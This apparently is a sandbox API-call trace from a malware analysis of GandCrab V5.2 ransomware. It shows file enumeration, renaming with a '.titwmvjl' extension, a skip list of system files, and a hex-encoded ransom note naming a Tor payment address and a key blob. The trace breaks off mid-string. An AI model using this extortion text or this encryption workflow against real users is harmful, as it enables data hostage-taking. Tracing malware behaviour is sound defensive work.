FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.026] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0097.026] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0097.026] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\Downloads\\d2ca4a09d2ca4deb61a.lock" [0097.026] lstrlenW (lpString=".titwmvjl") returned 9 [0097.026] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 50 [0097.026] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.026] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Downloads\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 59 [0097.026] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 50 [0097.026] lstrlenW (lpString=".lock") returned 5 [0097.026] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.027] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0097.027] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.027] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.027] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.027] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0097.027] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0097.027] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Downloads\\desktop.ini") returned="C:\\Users\\Public\\Downloads\\desktop.ini" [0097.027] lstrlenW (lpString=".titwmvjl") returned 9 [0097.027] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37 [0097.027] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.027] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Downloads\\desktop.ini.titwmvjl") returned 46 [0097.027] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37 [0097.027] lstrlenW (lpString=".ini") returned 4 [0097.027] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.028] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0097.028] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0097.028] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.028] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37 [0097.028] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\desktop.ini") returned 37 [0097.028] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0097.028] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.028] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.028] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.028] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.028] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Downloads\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\Downloads\\TITWMVJL-DECRYPT.txt" [0097.028] lstrlenW (lpString=".titwmvjl") returned 9 [0097.028] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\TITWMVJL-DECRYPT.txt") returned 46 [0097.028] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.028] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Downloads\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 55 [0097.028] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\TITWMVJL-DECRYPT.txt") returned 46 [0097.028] lstrlenW (lpString=".txt") returned 4 [0097.028] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.029] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.029] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.029] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.029] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\TITWMVJL-DECRYPT.txt") returned 46 [0097.029] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\TITWMVJL-DECRYPT.txt") returned 46 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.029] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.029] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.029] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0097.029] FindClose (in: hFindFile=0x503678 | out: hFindFile=0x503678) returned 1 [0097.030] CloseHandle (hObject=0x230) returned 1 [0097.030] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0097.030] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0097.030] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0097.030] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0097.030] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0097.030] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.030] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.030] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.031] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.031] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.031] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.031] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.031] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.031] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.031] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.031] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.031] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Libraries\\\\TITWMVJL-DECRYPT.txt") returned 47 [0097.031] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\libraries\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0097.033] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x